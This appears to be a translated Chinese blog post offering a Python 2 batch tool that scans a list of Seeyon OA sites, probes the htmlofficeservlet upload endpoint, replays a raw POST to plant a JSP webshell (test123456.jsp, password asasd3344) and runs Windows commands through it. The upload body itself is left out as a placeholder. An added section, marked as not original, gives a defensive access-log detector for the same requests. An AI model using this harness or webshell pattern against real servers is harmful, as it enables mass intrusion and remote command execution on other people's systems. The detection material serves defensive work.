A few words up front

I don't know whether the hole came out in the afternoon or in the evening; in any case I only heard about it in the evening, grabbed the exp and quickly wrote a simple batch script. The masters have probably long since played this hole to death, but this is purely for study, writing some code to improve my ability to write exps, pocs and tools for my own use. For exchange only; the consequences of misuse are your own.

Code

The exp part has been commented out; please understand.

Environment: python2.7

Libraries: hackhttp, re

#!/usr/bin/env python
# coding=utf-8

import hackhttp
import re


print '''

                    致远OA getshell 批量漏洞检测利用工具。

                                       From ChaBug - 撕夜

'''.decode('utf-8')


def Geturl():
    # One target per line in url.txt, e.g. http://www.example.com
    urls = []
    for url in open("url.txt"):
        url = url.strip()
        if url:
            urls.append(url)
    return urls


def Poc(raw_data):

    url_list = Geturl()
    # print url_list
    for url in url_list:
        # Step 1: is a shell with the known name and password already there?
        shellurl = url + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+ipconfig"
        code, head, html, redirect_url, log = rep.http(url=shellurl)

        if "Windows" in html:
            print "[ + ] Shell Existing: " + shellurl.replace("?pwd=asasd3344&cmd=cmd+/c+ipconfig", "")
        else:
            # Step 2: does the upload servlet answer at all?
            uu = url + "/seeyon/htmlofficeservlet"
            code, head, html, redirect_url, log = rep.http(url=uu)

            if 'DBSTEP' in html:
                print "Loopholes!!!"
                print "Please wait......"
                print Exp(url, uu, raw_data)
            else:
                print "Maybe no loopholes."

    print "[ * ] End of the test."


def Exp(base, u, data):

    # Replay the raw request against the servlet (its {exp} body is left out above)
    code, head, html, redirect_url, log = rep.http(url=u, raw=data)
    if "test123456" in html:
        # Verify the freshly written shell before reporting it; base is the site root,
        # not the servlet URL, so the shell path is not appended to the servlet path
        shellurl = base + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+ipconfig"
        code, head, html, redirect_url, log = rep.http(url=shellurl)

        if "Windows" in html:
            return "[ + ] Shell Address: " + shellurl.replace("?pwd=asasd3344&cmd=cmd+/c+ipconfig", "")
        return "[ + ] Shell address: " + base + "/seeyon/test123456.jsp"

    else:
        return "[ - ] Getshell failed please check it in yourself!"


rep = hackhttp.hackhttp()
# data = base64.b64decode('{exp_b64}')
raw_data = '''POST /seeyon/htmlofficeservlet HTTP/1.1
Host: *******
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Cookie: Hm_lvt_3eec0b7da6548cf07db3bc477ea905ee=1534738067; _ga=GA1.1.1670437955.1534738070; Hm_lvt_ebfd8073dcbdb7573367d9c7aa04d998=1546780543
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1111

{exp}
'''


if __name__ == "__main__":
    Poc(raw_data)

Just put a url.txt in the same directory. (url: http://www.example.com)

Results

Simple functionality:

Check whether a shell has already been written; if one has and its password is not the original exp's password, write it again.

Check whether the vulnerability may exist.

If the vulnerability exists, write the shell.

(shell: test123456.jsp, pwd=asasd3344, command execution: ?pwd=asasd3344&cmd=cmd+/c+whoami)
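Seen from the other side, the three steps above leave a very recognisable trail in a web server's access log. As an added example that is not part of the original post, the Python 3 snippet below runs over a few constructed access log lines and flags exactly that sequence: a GET probe of /seeyon/htmlofficeservlet, a POST to it, and any JSP under /seeyon/ called with a cmd= parameter. Only the paths and parameter names come from the post; the addresses, timestamps and log lines are constructed for the example.

```python
#!/usr/bin/env python3
# Added example (not part of the original post): flag, in web server access logs,
# the request pattern that the batch script above produces against a Seeyon OA host.
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Endpoints taken from the script above
UPLOAD_PATH = "/seeyon/htmlofficeservlet"
SHELL_NAME = "test123456.jsp"

# Combined log format; the regex only captures the fields used below
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample, not a real capture: 203.0.113.7 runs the full
# check / probe / upload / execute sequence, 198.51.100.2 is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [27/Jun/2019:21:03:11 +0800] "GET /seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+ipconfig HTTP/1.1" 404 312
203.0.113.7 - - [27/Jun/2019:21:03:12 +0800] "GET /seeyon/htmlofficeservlet HTTP/1.1" 200 46
203.0.113.7 - - [27/Jun/2019:21:03:12 +0800] "POST /seeyon/htmlofficeservlet HTTP/1.1" 200 128
203.0.113.7 - - [27/Jun/2019:21:03:13 +0800] "GET /seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd+/c+whoami HTTP/1.1" 200 57
198.51.100.2 - - [27/Jun/2019:21:03:14 +0800] "GET /seeyon/main.do HTTP/1.1" 200 8841
198.51.100.2 - - [27/Jun/2019:21:03:15 +0800] "GET /seeyon/index.jsp HTTP/1.1" 200 4090
"""


def classify(method, target):
    """Return a finding kind for one request line, or None if it looks benign."""
    parts = urlsplit(target)
    path, query = parts.path, parse_qs(parts.query)
    if path == UPLOAD_PATH:
        # POST is the write attempt; GET is the "does the servlet answer" probe
        return "upload-post" if method == "POST" else "servlet-probe"
    if path.startswith("/seeyon/") and path.endswith(".jsp") and "cmd" in query:
        # A cmd= parameter on a JSP under /seeyon/ is the shell invocation shape
        return "webshell-command"
    if path.endswith("/" + SHELL_NAME):
        # The shell's file name alone, even without cmd=, is worth a look
        return "known-shell-name"
    return None


def scan_access_log(text):
    """Parse log lines and return the findings (dicts) in log order."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m.group("method"), m.group("target"))
        if kind is None:
            continue
        query = parse_qs(urlsplit(m.group("target")).query)
        findings.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "kind": kind,
            "status": int(m.group("status")),
            "cmd": query.get("cmd", [None])[0],  # URL-decoded command, if any
        })
    return findings


def sources(findings):
    """Count findings per client address so a full sequence from one IP stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits = scan_access_log(SAMPLE_LOG)
    for f in hits:
        print(f["ts"], f["ip"], f["kind"], f["status"], f["cmd"] or "")
    print(dict(sources(hits)))
```

Two things the sample makes visible: the first hit is a 404, because the script asks for the shell before it exists, so a detection that only looks at 2xx responses would miss the very first step; and the User-Agent in the raw request is a stock Firefox string, so the paths and the cmd= parameter, not the client header, are what to alert on.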

Closing words

Writing a detection and exploitation tool for a vulnerability that has been played to death was purely to raise my coding level. I did run into some problems while writing it and in the end switched to the hackhttp library, since the requests library seemed to require parameters when posting data, which cost me some time.

Addendum, 6.27: the requests library can post without parameters; the payload was wrong during testing, which is why nothing was ever returned.